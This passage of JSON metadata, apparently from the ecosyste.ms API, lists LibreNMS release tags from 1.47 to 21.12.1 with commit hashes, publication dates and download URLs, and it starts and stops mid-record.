1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/21.12.1/manifests"},{"name":"21.12.0","sha":"b27efefb915801ff450e6b7a6e64130245ff3ffd","kind":"commit","published_at":"2021-12-22T01:57:55.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/21.12.0","html_url":"https://github.com/librenms/librenms/releases/tag/21.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@21.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/21.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/21.12.0/manifests"},{"name":"21.11.0","sha":"6b41c29f5f7a8cec104c17737df0a6e50755f66c","kind":"commit","published_at":"2021-11-12T17:03:39.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/21.11.0","html_url":"https://github.com/librenms/librenms/releases/tag/21.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@21.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/21.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/21.11.0/manifests"},{"name":"21.10.2","sha":"e377292d7cb82888ae011d5d8f1dcf30dd1e9a06","kind":"commit","published_at":"2021-10-21T15:15:51.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/21.10.2","html_url":"https://github.com/librenms/librenms/releases/tag/21.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@21.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/21.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/21.10.2/manifests"},{"name":"21.10.1","sha":"9925e2025ac489ef21478eb8f288c6811c47a43a","kind":"commit","published_at":"2021-10-18T22:31:16.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/21.10.1","html_url":"https://github.com/librenms/librenms/releases/tag/21.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@21.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/21.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/21.10.1/manifests"},{"name":"21.10.0","sha":"98ee2374202b6ec6cfd55a494ba5ffdcf4aa3c9e","kind":"commit","published_at":"2021-10-16T13:02:35.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/21.10.0","html_url":"https://github.com/librenms/librenms/releases/tag/21.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@21.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/21.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/21.10.0/manifests"},{"name":"21.9.1","sha":"48482adc8b81fa6ec558f97b5a0c3e4af632a894","kind":"commit","published_at":"2021-09-28T03:20:35.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/21.9.1","html_url":"https://github.com/librenms/librenms/releases/tag/21.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@21.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/21.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/21.9.1/manifests"},{"name":"21.9.0","sha":"b4b4820cbaa0708233062c94d3c4419971115804","kind":"commit","published_at":"2021-09-17T03:45:07.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/21.9.0","html_url":"https://github.com/librenms/librenms/releases/tag/21.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@21.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/21.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/21.9.0/manifests"},{"name":"21.8.0","sha":"e5e2633fbb4f6e9207faa638afbf050a3e4f70b8","kind":"commit","published_at":"2021-08-22T20:49:45.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/21.8.0","html_url":"https://github.com/librenms/librenms/releases/tag/21.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@21.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/21.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/21.8.0/manifests"},{"name":"21.7.0","sha":"5147ce866c20b8f7d77cd120345b763905318cd3","kind":"commit","published_at":"2021-07-16T22:28:22.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/21.7.0","html_url":"https://github.com/librenms/librenms/releases/tag/21.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@21.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/21.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/21.7.0/manifests"},{"name":"21.6.0","sha":"fb2608ee3dafbaaeba51421fed1d221218699c39","kind":"commit","published_at":"2021-06-18T04:35:44.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/21.6.0","html_url":"https://github.com/librenms/librenms/releases/tag/21.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@21.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/21.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/21.6.0/manifests"},{"name":"21.5.1","sha":"a880643ba447c907bd86d71216fe2a6900bab245","kind":"commit","published_at":"2021-05-19T12:27:26.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/21.5.1","html_url":"https://github.com/librenms/librenms/releases/tag/21.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@21.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/21.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/21.5.1/manifests"},{"name":"21.5.0","sha":"e782bdbe02a21858a5df6e0a1ee4da5c8da6c71f","kind":"commit","published_at":"2021-05-18T00:17:53.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/21.5.0","html_url":"https://github.com/librenms/librenms/releases/tag/21.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@21.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/21.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/21.5.0/manifests"},{"name":"21.4.0","sha":"5f7682d4fe324e3e1fa9cdd6351be92e5757b45a","kind":"commit","published_at":"2021-04-18T04:05:07.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/21.4.0","html_url":"https://github.com/librenms/librenms/releases/tag/21.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@21.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/21.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/21.4.0/manifests"},{"name":"21.3.0","sha":"d24730818f617898a6c0edd9654c649b02373ae7","kind":"commit","published_at":"2021-03-20T23:58:30.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/21.3.0","html_url":"https://github.com/librenms/librenms/releases/tag/21.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@21.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/21.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/21.3.0/manifests"},{"name":"21.2.0","sha":"7b52b70b3ad7accd9a038cf36b2d1ee35ef5a882","kind":"commit","published_at":"2021-02-16T04:52:41.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/21.2.0","html_url":"https://github.com/librenms/librenms/releases/tag/21.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@21.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/21.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/21.2.0/manifests"},{"name":"21.1.0","sha":"58a740cf818494c06f4f3fe90ecccb58e08f0ffd","kind":"commit","published_at":"2021-02-02T02:57:06.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/21.1.0","html_url":"https://github.com/librenms/librenms/releases/tag/21.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@21.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/21.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/21.1.0/manifests"},{"name":"1.70.1","sha":"e2fb7ba635553a7bf705ec967d9a9d764f9be7ba","kind":"commit","published_at":"2020-12-02T14:39:06.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.70.1","html_url":"https://github.com/librenms/librenms/releases/tag/1.70.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.70.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.70.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.70.1/manifests"},{"name":"1.70.0","sha":"84c08f424c25cb0a4d78216a4de94c5f89c19e61","kind":"commit","published_at":"2020-12-02T04:01:19.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.70.0","html_url":"https://github.com/librenms/librenms/releases/tag/1.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.70.0/manifests"},{"name":"1.69","sha":"0ac05fda69b2a56f775d8c3ae2a41a3c58ef452c","kind":"commit","published_at":"2020-11-02T03:25:18.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.69","html_url":"https://github.com/librenms/librenms/releases/tag/1.69","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.69","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.69","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.69/manifests"},{"name":"1.68","sha":"90d0d46dfbc0558e57fa5eb0649ebfaa17f933a0","kind":"commit","published_at":"2020-09-30T03:16:05.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.68","html_url":"https://github.com/librenms/librenms/releases/tag/1.68","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.68","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.68","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.68/manifests"},{"name":"1.67","sha":"eb1407ff01bbfab72cc9514dab4e7678593e392f","kind":"commit","published_at":"2020-09-03T09:06:31.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.67","html_url":"https://github.com/librenms/librenms/releases/tag/1.67","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.67","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.67","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.67/manifests"},{"name":"1.66","sha":"ff3926d28e2a5116cb9762390440ee94f7025979","kind":"tag","published_at":"2020-07-30T05:36:44.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.66","html_url":"https://github.com/librenms/librenms/releases/tag/1.66","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.66","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.66","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.66/manifests"},{"name":"1.65.1","sha":"15496dffd964a5033196550dcaef8c67e97e8b95","kind":"commit","published_at":"2020-07-10T19:56:16.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.65.1","html_url":"https://github.com/librenms/librenms/releases/tag/1.65.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.65.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.65.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.65.1/manifests"},{"name":"1.65","sha":"8a6de3ef233421be1962efb896cafc96e8f3dc20","kind":"commit","published_at":"2020-07-03T05:50:46.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.65","html_url":"https://github.com/librenms/librenms/releases/tag/1.65","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.65","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.65","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.65/manifests"},{"name":"1.64.1","sha":"ee7fa1e1cb9f693bf76a9d223894d28cae808ef8","kind":"commit","published_at":"2020-06-01T16:24:49.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.64.1","html_url":"https://github.com/librenms/librenms/releases/tag/1.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.64.1/manifests"},{"name":"1.64","sha":"e8dff37eef65e32e765114d811d505117e029000","kind":"commit","published_at":"2020-05-31T15:48:00.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.64","html_url":"https://github.com/librenms/librenms/releases/tag/1.64","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.64","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.64","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.64/manifests"},{"name":"1.63","sha":"84c1f1a0b63349b8c659b1ac3fc4d86b289d1e1c","kind":"commit","published_at":"2020-04-28T03:52:42.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.63","html_url":"https://github.com/librenms/librenms/releases/tag/1.63","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.63","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.63","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.63/manifests"},{"name":"1.62.2","sha":"a82ee4b02bc713e2093a88b840b50efcc0dc25df","kind":"commit","published_at":"2020-04-04T16:04:02.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.62.2","html_url":"https://github.com/librenms/librenms/releases/tag/1.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.62.2/manifests"},{"name":"1.62.1","sha":"b96dcf9836e7492823fdf5d830a73ba315c0f9b9","kind":"commit","published_at":"2020-04-03T12:58:37.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.62.1","html_url":"https://github.com/librenms/librenms/releases/tag/1.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.62.1/manifests"},{"name":"1.62","sha":"46c0587cafe6b917ad5ba1a73e8488e455f3ffaa","kind":"commit","published_at":"2020-04-01T01:51:06.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.62","html_url":"https://github.com/librenms/librenms/releases/tag/1.62","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.62","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.62","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.62/manifests"},{"name":"1.61","sha":"c70e1b936a8c1d68a3ac72c06d456652d9d1ac80","kind":"commit","published_at":"2020-03-02T04:03:32.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.61","html_url":"https://github.com/librenms/librenms/releases/tag/1.61","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.61","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.61","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.61/manifests"},{"name":"1.60","sha":"6e9329b4a9ee6de4c40d240a59543190f3498cb8","kind":"commit","published_at":"2020-02-04T10:29:59.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.60","html_url":"https://github.com/librenms/librenms/releases/tag/1.60","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.60","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.60","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.60/manifests"},{"name":"1.59","sha":"d21eb10af6ec03a3103b7ea56cbdf127256aa91d","kind":"commit","published_at":"2020-01-04T15:08:35.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.59","html_url":"https://github.com/librenms/librenms/releases/tag/1.59","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.59","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.59","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.59/manifests"},{"name":"1.58.1","sha":"2a66c6100fdec25058b7f5ab2e8f65601078bc78","kind":"commit","published_at":"2019-11-26T23:56:47.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.58.1","html_url":"https://github.com/librenms/librenms/releases/tag/1.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.58.1/manifests"},{"name":"1.58","sha":"2de39f58b3257c6e5d3a4f67bc4c33f2c43a7b78","kind":"commit","published_at":"2019-11-25T04:54:18.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.58","html_url":"https://github.com/librenms/librenms/releases/tag/1.58","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.58","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.58","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.58/manifests"},{"name":"1.57","sha":"00baac54df48ce6b5b2386e6885fe32046f8644e","kind":"commit","published_at":"2019-10-29T00:40:17.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.57","html_url":"https://github.com/librenms/librenms/releases/tag/1.57","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.57","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.57","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.57/manifests"},{"name":"1.56","sha":"4c075a34847e6793dfcbc8f1e8aeebc3cf9c0419","kind":"commit","published_at":"2019-09-30T11:07:05.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.56","html_url":"https://github.com/librenms/librenms/releases/tag/1.56","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.56","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.56","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.56/manifests"},{"name":"1.55","sha":"74f1f65234a0645cbb346faabea5f0b4a48b4597","kind":"commit","published_at":"2019-09-03T04:19:02.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.55","html_url":"https://github.com/librenms/librenms/releases/tag/1.55","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.55","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.55","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.55/manifests"},{"name":"1.54","sha":"c14fd96bb473cd18ef696a870abf2b54f6e55bb7","kind":"commit","published_at":"2019-07-29T02:47:34.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.54","html_url":"https://github.com/librenms/librenms/releases/tag/1.54","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.54","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.54","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.54/manifests"},{"name":"1.53.1","sha":"f83ce13a7adbf6069b62bed727c7853c1c744399","kind":"commit","published_at":"2019-07-02T12:11:58.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.53.1","html_url":"https://github.com/librenms/librenms/releases/tag/1.53.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.53.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.53.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.53.1/manifests"},{"name":"1.53","sha":"87a2231469ffff35dbd035f63bc24d5956c3e9b2","kind":"commit","published_at":"2019-07-01T05:07:02.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.53","html_url":"https://github.com/librenms/librenms/releases/tag/1.53","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.53","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.53","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.53/manifests"},{"name":"1.52","sha":"38a638358df8a73154c7f68cb2ec5379aa67294f","kind":"commit","published_at":"2019-05-28T01:20:13.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.52","html_url":"https://github.com/librenms/librenms/releases/tag/1.52","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.52","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.52","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.52/manifests"},{"name":"1.51","sha":"5c6a9ab623aa913f892038d547ff32f725ed1fa8","kind":"commit","published_at":"2019-04-29T21:36:21.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.51","html_url":"https://github.com/librenms/librenms/releases/tag/1.51","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.51","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.51","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.51/manifests"},{"name":"1.50.1","sha":"f37e28a5f2f7a1bc90de534ff951afc89531c24d","kind":"commit","published_at":"2019-04-13T01:47:50.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.50.1","html_url":"https://github.com/librenms/librenms/releases/tag/1.50.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.50.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.50.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.50.1/manifests"},{"name":"1.50","sha":"9661e6b9b36ac1cb1926d8a5910c5997ce59ffe9","kind":"commit","published_at":"2019-04-01T03:44:01.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.50","html_url":"https://github.com/librenms/librenms/releases/tag/1.50","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.50","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.50","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.50/manifests"},{"name":"1.49","sha":"411f36a9a1d6aaad47e8ae3ad3547715c58170ed","kind":"commit","published_at":"2019-03-04T03:37:13.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.49","html_url":"https://github.com/librenms/librenms/releases/tag/1.49","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.49","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.49","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.49/manifests"},{"name":"1.48.1","sha":"c4ca7a4f1f3888d50333cd16c346544dd9e673e6","kind":"commit","published_at":"2019-01-30T20:53:43.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.48.1","html_url":"https://github.com/librenms/librenms/releases/tag/1.48.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.48.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.48.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.48.1/manifests"},{"name":"1.48","sha":"60a39caa3518b474d3bc9c93de6a5fbaf1321dd6","kind":"commit","published_at":"2019-01-28T17:30:17.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.48","html_url":"https://github.com/librenms/librenms/releases/tag/1.48","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.48","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.48","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.48/manifests"},{"name":"1.47","sha":"03d6d76908b21612988af0ab112a787863ba183a","kind":"commit","published_at":"2018-12-30T14:29:16.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/1.47","html_url":"https://github.com/librenms/librenms/releases/tag/1.47","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@1.47","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/1.47","manifests_url":"https://repos.ecosyste.ms/api/v1/